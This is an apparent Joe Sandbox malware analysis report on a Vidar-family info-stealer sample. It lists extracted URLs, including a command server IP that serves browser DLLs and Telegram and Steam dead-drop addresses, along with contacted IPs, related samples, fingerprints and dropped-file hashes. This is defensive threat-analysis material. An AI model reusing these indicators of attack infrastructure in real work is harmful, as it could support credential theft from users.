https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue[1].dll.4.dr, mozglue.dll.4.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=3gW5J8_jG_Yc&l=e	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://95.217.246.168/msvcp140.dlln	RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://mozilla.org0/	mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	false	URL Reputation: safe	unknown
https://95.217.246.168/mozglue.dllL	RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/freebl3.dll8	RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://95.217.246.168/mozglue.dllP	RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	CBAFIDAE.4.dr	false		high
https://95.217.246.168/freebl3.dll2	RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0	file.exe, 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp, KJJECGHJ.4.dr	false		high
https://www.ecosia.org/newtab/	CBAFIDAE.4.dr	false		high
https://95.217.246.168/nss3.dllp	RegAsm.exe, 00000004.00000002.2202047159.0000000001386000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199677575543[1].htm.4.dr	false		high
https://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://95.217.246.168/s:	RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	KJJECGHJ.4.dr	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://store.steampowered.com/about/	76561199677575543[1].htm.4.dr	false		high
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://steamcommunity.com//	RegAsm.exe, 00000004.00000002.2202047159.00000000012EF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/snsb82At	file.exe, 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://steamcommunity.com/market/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://store.steampowered.com/news/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://95.217.246.168/softokn3.dllx	RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://95.217.246.168KJD	RegAsm.exe, 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	CBAFIDAE.4.dr	false		high
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp, KJJECGHJ.4.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://steamcommunity.com/discussions/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://store.steampowered.com/stats/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=98m_	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://store.steampowered.com/steam_refunds/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	KJJECGHJ.4.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	CBAFIDAE.4.dr	false		high
https://steamcommunity.com/workshop/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://store.steampowered.com/legal/	RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://t.me/snsb82	file.exe, file.exe, 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
http://www.sqlite.org/copyright.html.	RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.dr	false		high
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	76561199677575543[1].htm.4.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	CBAFIDAE.4.dr	false		high
https://steamcommunity.com/profiles/76561199677575543x	RegAsm.exe, 00000004.00000002.2202047159.00000000012EF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/	76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe	RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://steamcommunity.com/profiles/76561199677575543i	RegAsm.exe, 00000004.00000002.2202047159.00000000012EF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://ac.ecosia.org/autocomplete?q=	CBAFIDAE.4.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://95.217.246.168/nss3.dll&	RegAsm.exe, 00000004.00000002.2202047159.0000000001386000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.194.234.100	steamcommunity.com	United States		16625	AKAMAI-ASUS	false
95.217.246.168	unknown	Germany		24940	HETZNER-ASDE	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432331
Start date and time:	2024-04-26 21:34:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/21@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 95 Number of non-executed functions: 206
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
21:35:18	API Interceptor	1x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
23.194.234.100	file.exe	Get hash	malicious	Vidar	Browse
	UJzMs6lsyF.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	CDssd7jEvY.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	7qAKRRMho6.exe	Get hash	malicious	GCleaner, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
95.217.246.168	file.exe	Get hash	malicious	Vidar	Browse
95.217.246.168	file.exe	Get hash	malicious	Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	file.exe	Get hash	malicious	Vidar	Browse	23.194.234.100
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196
	n8XBpFdVFU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	96.17.209.196
	R5391762lf.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	23.66.133.162
	file.exe	Get hash	malicious	Vidar	Browse	96.17.209.196
	sIQywRNC5M.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	184.85.65.125
	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	23.65.44.84
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	184.85.65.125
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.66.133.162
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.66.133.162

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	https://gjyefv.degaris.com/	Get hash	malicious	HTMLPhisher	Browse	23.193.106.20
	file.exe	Get hash	malicious	Unknown	Browse	23.50.112.29
	file.exe	Get hash	malicious	Unknown	Browse	23.50.112.28
	factura - ztcpyqiqtfiewxjhesna.msi	Get hash	malicious	Unknown	Browse	23.44.94.139
	file.exe	Get hash	malicious	Vidar	Browse	23.194.234.100
	RemotePCHost.exe	Get hash	malicious	Unknown	Browse	184.31.62.93
	https://autode.sk/4bb5BeV	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	23.214.187.157
	aios3.exe	Get hash	malicious	Unknown	Browse	184.31.60.185
	http://email.wantyourfeedback.com/ls/click?upn=u001.PD4nPnyJUo8oiEzSkSGLgaBNAMtLp9U5nstWElDmnpXtySPOXSs4GxXhEZNYegDWlOpy_1gt1aDjd5mPVItYgazWgABkVm-2FZUH6kt1lIvkdtkRWsfoyQV18ixDvOX-2B0tU4ZH6SMN7PC0YJjM3gcvFPvh6CbZuFXlOBXf3FWLiJkpKJ7Hjba3S4-2FzhpmkR8VdprfK8GO3qSu-2BzqpIaLLC-2Bva9kOn7HY5B7OIgz5EOl88o1lnRSRpayTzqRzTSFhtg2Bi-2BI4dAZ7qHRbJ3vb9lcrxBKqAk13I-2BCAvndhSK1Vi4ubCjlp2xQlrXIHfzqmLiSPjl7tEmTsLYr99h3esBOPv8ASLIpf873P512I7xYEOjogT1gQCerfZNqh6K2IdWU6lDJ2r3wpU6ug02vU9Zslw4DYpuNNZQNVtap5mqv9Xf8D1PYQxYI5BK4owXOV2wEXeRIjST24XAw6EO9D1tdiGoHDRaxW2QofayefCuiW9Z191aML90svJWojHiQp1Fq-2BXFLiyEx8V1eLa7dixfJ23RRWtHvg1jOrHp7lqvXRA7dobs-3D	Get hash	malicious	HTMLPhisher	Browse	23.59.235.214
	dwn1cGHIbV.elf	Get hash	malicious	Mirai	Browse	104.73.199.214
HETZNER-ASDE	file.exe	Get hash	malicious	Vidar	Browse	95.217.246.168
	http://www.tbmuae.com/	Get hash	malicious	GRQ Scam	Browse	136.243.216.235
	PHHOjspjmp.exe	Get hash	malicious	CMSBrute	Browse	95.216.154.139
	https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332	Get hash	malicious	Phisher	Browse	88.198.55.100
	https://url.us.m.mimecastprotect.com/s/qkT5Cv2pWyUOjZODty9fnF?domain=google.com	Get hash	malicious	Unknown	Browse	168.119.146.39
	https://colunroad.info/?utm_campaign=y0rsMyowMImIDv9DTSX69oig88PrjKrJ9agQ3DpV-9I1&t=back	Get hash	malicious	GRQ Scam	Browse	136.243.216.235
	http://www.mh3solaroh.com/	Get hash	malicious	HTMLPhisher	Browse	5.161.181.124
	https://starmicronics.com/support/download/starprnt-intelligence-software-setup-exe-file-v3-6-0a/#unlock	Get hash	malicious	Unknown	Browse	188.40.94.206
	16770075581.zip	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	148.251.133.229
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	Vidar	Browse	95.217.246.168
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	n8XBpFdVFU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	95.217.246.168
	R5391762lf.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	file.exe	Get hash	malicious	Vidar	Browse	95.217.246.168
	sIQywRNC5M.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	95.217.246.168
37f463bf4616ecd445d4a1937da06e19	neo.msi	Get hash	malicious	Latrodectus	Browse	23.194.234.100
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	23.194.234.100
	Dragons Dogma 2 v1.0 Plus 36 Trainer.exe	Get hash	malicious	Unknown	Browse	23.194.234.100
	Dragons Dogma 2 v1.0 Plus 36 Trainer.exe	Get hash	malicious	Unknown	Browse	23.194.234.100
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	23.194.234.100
	file.exe	Get hash	malicious	Vidar	Browse	23.194.234.100
	BundleSweetIMSetup.exe	Get hash	malicious	Unknown	Browse	23.194.234.100
	DHL_ES567436735845755676678877988975877.vbs	Get hash	malicious	FormBook, GuLoader, Remcos	Browse	23.194.234.100
	Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe	Get hash	malicious	GuLoader, Remcos	Browse	23.194.234.100
	ad.msi	Get hash	malicious	Latrodectus	Browse	23.194.234.100

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\HCFBAFIDAECA\mozglue.dll	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
C:\ProgramData\HCFBAFIDAECA\freebl3.dll	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse

Created / dropped Files

C:\ProgramData\AAKJEGCF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBAFIDAE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
